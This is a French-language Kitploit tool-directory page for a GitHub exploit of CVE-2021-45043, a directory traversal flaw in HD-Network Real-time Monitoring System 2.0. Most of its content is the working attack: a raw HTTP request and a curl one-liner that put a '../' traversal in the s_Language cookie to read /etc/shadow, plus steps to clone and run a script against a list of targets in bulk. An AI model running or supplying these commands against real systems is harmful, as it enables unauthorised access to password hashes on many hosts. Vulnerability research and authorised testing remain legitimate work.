Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2021-45043 — HD-Network Real-time Monitoring System 2.0 permet une traversée de répertoire ../ pour lire /etc/shadow via le paramètre /language/lang s_Language. | Kitploit
Outils/GitHubGitHub/crypt0g30rgy/cve-2021-45043
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubcrypt0g30rgy/cve-2021-45043

cve-2021-45043

HD-Network Real-time Monitoring System 2.0 permet une traversée de répertoire ../ pour lire /etc/shadow via le paramètre /language/lang s_Language.

Voir le dépôt
111il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

cve-2021-45043

HD-Network Real-time Monitoring System 2.0 permet une traversée de répertoire ../ pour lire /etc/shadow via le paramètre /language/lang s_Language.

publication initiale

https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f

exploitation via burp

GET /language/lang HTTP/1.1 Host: IP.target Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow

exploitation via une ligne de commande

curl -k -s -H "Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow" -X GET http://IP.target/language/lang

exploitation de cibles en masse

git clone https://github.com/g30rgyth3d4rk/cve-2021-45043.git

cd cve-2021-45043/

chmod +x script.sh

./script.sh targets.txt

Télécharger l’outil